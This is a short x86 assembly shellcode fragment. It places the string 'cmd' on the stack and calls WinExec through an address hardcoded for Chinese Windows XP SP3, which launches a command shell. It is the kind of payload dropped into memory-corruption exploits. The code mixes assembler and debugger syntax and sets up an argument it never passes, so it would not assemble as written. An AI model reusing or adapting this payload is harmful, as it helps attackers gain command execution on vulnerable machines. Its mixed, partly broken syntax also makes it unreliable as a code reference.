BITS 32
MOV EBP,ESP
XOR EDI,EDI
PUSH EDI
MOV BYTE PTR SS:[EBP-4],63
MOV BYTE PTR SS:[EBP-3],6D
MOV BYTE PTR SS:[EBP-2],64
MOV BYTE PTR SS:[EBP-8],1
LEA EAX,DWORD PTR SS:[EBP-4]
PUSH EAX
MOV EAX,kernel32.WinExec	;win xp sp3中文版上的WinExec硬编码地址0x7C8623AD
CALL EAX